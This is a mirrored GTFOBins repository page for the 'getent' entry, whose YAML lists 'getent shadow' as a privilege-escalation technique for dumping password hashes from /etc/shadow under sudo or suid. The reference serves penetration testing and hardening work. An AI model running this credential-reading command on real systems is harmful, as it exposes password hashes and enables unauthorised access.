1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-03-07 06:31:33 +01:00
GTFOBins.github.io/_gtfobins/getent
2026-01-21 17:22:09 +01:00

12 lines
201 B
Plaintext

---
functions:
privilege-escalation:
- code: |-
getent shadow
comment: |-
This allows to dump password hashes from the `/etc/shadow` file.
contexts:
sudo:
suid:
...